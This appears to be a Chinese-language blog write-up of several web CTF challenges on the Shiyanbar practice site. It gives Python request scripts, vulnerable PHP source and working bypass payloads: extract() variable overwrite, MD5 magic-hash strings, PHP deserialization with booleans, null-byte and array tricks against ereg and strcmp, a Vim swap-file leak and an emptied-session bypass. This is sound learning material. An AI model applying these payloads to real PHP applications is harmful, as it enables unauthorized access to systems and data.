西普实验吧-ctf-web-1

天下武功唯快不破

http://ctf4.shiyanbar.com/web/10.php

看题目，是要post一个值过去，看源码可以知道键为key，在Header中可以发现一个字段，FLAG

注释的重要性：<!-- please post what you find with parameter:key -->

post key=FLAG的值发现提示，必须更快，那么就只有写脚本来完成了

（注意的是，返回的FLAG解base64之后是xxx:xxx），冒号后面的才是要提交的值，所以这里要分割一下

运行得到flag 

import base64 import urllib2 import urllib
url = 'http://ctf4.shiyanbar.com/web/10.php' 

req = urllib2.Request(url)
rsp = urllib2.urlopen(req)
flag = rsp.info().getheader('FLAG')
flag = base64.b64decode(flag)
flag = flag.split(':')[1] 

print flag
data = urllib.urlencode({'key':flag})
req1 = urllib2.Request(url, data=data)
rsp = urllib2.urlopen(req1).read() 

print rsp

注：查看源码；Base64编码

 

安女神之名

1. 和GFW没有关系，它就是过滤了“安女神”三个字

2.安女神用什么编码好？备注以GET方式送出，URL编码没有什么用处，到了服务器端会被解码，所以用&#XXX;这种格式的HTML编码。对照表如下：

http://www.jb51.net/onlineread/htmlchar.htm 

http://www.theukwebdesigncompany.com/articles/entity-escape-characters.php

其实就是Unicode编码加上了前缀&#。

Unicode编码在线工具：http://tool.chinaz.com/Tools/unicode.aspx

所以安女神的编码后得到&#23433;&#22899;&#31070;

好吧，如果你用16进制&#x5b89;&#x5973;&#x795e;

输入后得到：flag = [[415 Unavailable For Legal Reasons]]

好吧，比较无聊，查看源码发现flag.

注：查看源码，HTML实体编码，Unicode编码

 

思路很重要

页面就是http://ctf4.shiyanbar.com/web/9/index.php

404found

我很喜欢。。可是，他不让查源码。。好，我就用python发包。或者，Firebug查看一下也可以。。（要选择显示注释，不然看不到，所以还是自己写程序比较好，这样信息得到的全，不容易忘）

import urllib2
import urllib
url = 'http://ctf4.shiyanbar.com/web/9/'
req = urllib2.Request(url)
response = urllib2.urlopen(req)
print response.read()

我粗心的没注意到源码那句“<!-- 粗心的程序员，写完代码也不删。-->”

所以就不会去查index.php~\index.php.bak这类临时文件。。

所以就不会发现该文件里的：

$flag='xxx';     
extract($_GET);     
if(isset($shiyan)){        
    $content=trim(file_get_contents($flag));
    if($shiyan==$content){ 
       echo'ctf{xxx}';     }
     else{       
       echo'Oh.no';}   
     }

然后就不会发现，这就是是一个GET提交，然后绕过验证的问题。

就不会使用 flag=乱七八糟的东西&shiyan=的参数添加来解决问题。关于变量覆盖，以后还要多学习，这个算基本无阻碍的。。

http://ctf4.shiyanbar.com/web/9/index.php?flag=&shiyan=

得到的结果也不是ctf{xxxxxxx}格式，所以，是加了密的，别怕，最简单的移位。

注：源码挖掘，临时文件

 

Forms

确实很简单，首先，网页太简单了，所以不是源码里藏了东西，就是发送的时候包里有东西。我们截取包，发现里面有个

showsource，必须改为1，然后题就结了。

 

拐弯抹角

我觉得这道题挺不错，访问地址是：http://ctf5.shiyanbar.com/10/indirection/index.php

就是分7个步骤判断URL是否满足条件，URL重写的判断

我觉得源码很有趣，有教育意义，放出来：

Flag:
<?php 
// code by SEC@USTC 

echo '<html><head><meta http-equiv="charset" content="gbk"></head><body>'; 

$URL = $_SERVER['REQUEST_URI']; 
//echo 'URL: '.$URL.'<br/>'; 
$flag = "CTF{???}"; 

$code = str_replace($flag, 'CTF{???}', file_get_contents('./index.php')); 
$stop = 0; 

//这道题目本身也有教学的目的 
//第一，我们可以构造 /indirection/a/../ /indirection/./ 等等这一类的 
//所以，第一个要求就是不得出现 ./ 
if($flag && strpos($URL, './') !== FALSE){ 
    $flag = ""; 
    $stop = 1;        //Pass 
} 

//第二，我们可以构造 \ 来代替被过滤的 / 
//所以，第二个要求就是不得出现 ../ 
if($flag && strpos($URL, '\\') !== FALSE){ 
    $flag = ""; 
    $stop = 2;        //Pass 
} 

//第三，有的系统大小写通用，例如 indirectioN/ 
//你也可以用?和#等等的字符绕过，这需要统一解决 
//所以，第三个要求对可以用的字符做了限制，a-z / 和 . 
$matches = array(); 
preg_match('/^([a-z\/.]+)$/', $URL, $matches); 
if($flag && empty($matches) || $matches[1] != $URL){ 
    $flag = ""; 
    $stop = 3;        //Pass 
} 

//第四，多个 / 也是可以的 
//所以，第四个要求是不得出现 // 
if($flag && strpos($URL, '//') !== FALSE){ 
    $flag = ""; 
    $stop = 4;        //Pass 
} 

//第五，显然加上index.php或者减去index.php都是可以的 
//所以我们下一个要求就是必须包含/index.php，并且以此结尾 
if($flag && substr($URL, -10) !== '/index.php'){ 
    $flag = ""; 
    $stop = 5;        //Not Pass 
} 

//第六，我们知道在index.php后面加.也是可以的 
//所以我们禁止p后面出现.这个符号 
if($flag && strpos($URL, 'p.') !== FALSE){ 
    $flag = ""; 
    $stop = 6;        //Not Pass 
} 

//第七，现在是最关键的时刻 
//你的$URL必须与/indirection/index.php有所不同 
if($flag && $URL == '/indirection/index.php'){ 
    $flag = ""; 
    $stop = 7;        //Not Pass 
} 
if(!$stop) $stop = 8; 

echo 'Flag: '.$flag; 
echo '<hr />'; 
for($i = 1; $i < $stop; $i++) 
    $code = str_replace('//Pass '.$i, '//Pass', $code); 
for(; $i < 8; $i++) 
    $code = str_replace('//Pass '.$i, '//Not Pass', $code); 


echo highlight_string($code, TRUE); 

echo '</body></html>'

好吧，不能用 ./ // ../而且还不能在index.php后面加.而且结尾必须是index.php而且不能用正常的访问路径。。有同学发现，其实index.php后面加“/乱七八糟，没有也成/index.php”就可以啦。原因是服务器解析到.php后就把后面的东西当作参数处理了（最新测试这个方法失效了，按理来说这是不应该的。。）

 

天网管理系统

告诉了用户名和密码是admin，然没个鸟用。。

查源码先：

<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') –>

然后就是md5怎么得到0的问题。。0e+数字

看大神题解，s878926199a、240610708、QNKCDZO、aabg7XSs、aabC9RqS就可以，怎么得到的呢，下次再说吧。。

然后得到提示，查看提示的网页，得到：

$unserialize_str = $_POST['password'];
     $data_unserialize = unserialize($unserialize_str);
     if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???')
     {
       print_r($flag);
     }
伟大的科学家php方言道：成也布尔，败也布尔。
回去吧骚年

查了下那个函数，有个大概的认识：http://www.cnblogs.com/yeer/archive/2009/03/25/1421161.html

先试了一下：{s:4:"user";s:5:"admin";s:4:"pass";s:5:"admin";}不理我，，，，

再试：{s:4:"user";b:1;s:4:"pass";b:1;}还是不鸟我。。。

前面标识一下参数个数：a:2:{s:4:"user";b:1;s:4:"pass";b:1;}，成了。

 关于==这个，看下这篇文章：http://www.cnblogs.com/ssooking/p/5877086.html

忘记密码了

这道题确实有难度，转的比较多，第一个，查源码，发现如下：

然后随便填一个mail去里面，比如youmail@mail.com然后就弹框：

./step2.php?email=youmail@mail.com&check=??????

我们访问这个链接，发现它弹回了step1.php，所以我们就，，，，，，wireshark截取包看了一下（要过滤额），发现了302重定向，所以我就用python发送包，截取了一下内容，发送的时候，用我们上面那个密码重置链接就可以啦：

也就是，这个过程是访问step2.php时，其实是将它内置的test@test.com发到submit.php里去了。那么我们再访问submit.php，显示的是"you are not an admin"。

接下来，就是vim的事情了。。Vim会产生临时文件。那么我们在浏览器里访问.submit.php.swp就可以啦。。。

token就是0，并且还要绕过长度限制（要求长度为10）

拿到flag的url : http://ctf5.shiyanbar.com/10/upload/submit.php?emailAddress=admin@simplexue.com&token=0000000000

Once More

php审计题，题目都说了，

<?php
if (isset ($_GET['password'])) {
	if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
	{
		echo '<p>You password must be alphanumeric</p>';
	}
	else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{
		if (strpos ($_GET['password'], '*-*') !== FALSE)
		{
			die('Flag: ' . $flag);
		}
		else
		{
			echo('<p>*-* have not been found</p>');
		}
	}
	else
	{
		echo '<p>Invalid password</p>';
	}
}
?>

ereg判断是不是字母数字类型

判断是不是长度<8且>9999999

判断是不是有“*-*”

构造输入password=1e9%00*-*

要直接在地址栏输入，不要在输入框中。。不然会变成1e9%2500*-*

除此之外，还有个解法：改成password[]=乱七八糟 也就是一个array类型和string比较，会返回NULL

 

输入密码

这道题和上面那道挺像，审计代码

if (isset($_GET['a'])) {  
    if (strcmp($_GET['a'], $flag) == 0)  
        die('Flag: '.$flag);  
    else  
        print '离成功更近一步了';  
}

其实是password。。不是a….

输入a[]=1就绕过了，我觉得这篇文挺好：浅谈PHP弱类型安全

 

Guess Next Session

这道题目就是猜密码？

给出的源码：

<?php
session_start(); 
if (isset ($_GET['password'])) {
    if ($_GET['password'] == $_SESSION['password'])
        die ('Flag: '.$flag);
    else
        print '<p>Wrong guess.</p>';
}

mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>

session题，只要我一开始不设置session，然后password置为空就好，咋治，截个包，改下session值。。

或者清除浏览记录，然后：http://ctf4.shiyanbar.com/web/Session.php?password= 就OK

这道题其实我觉得有点怪，学艺不精吧，但是似乎，用burp直接repeater下就好，把PHPSESSID=空然后password=空就好了。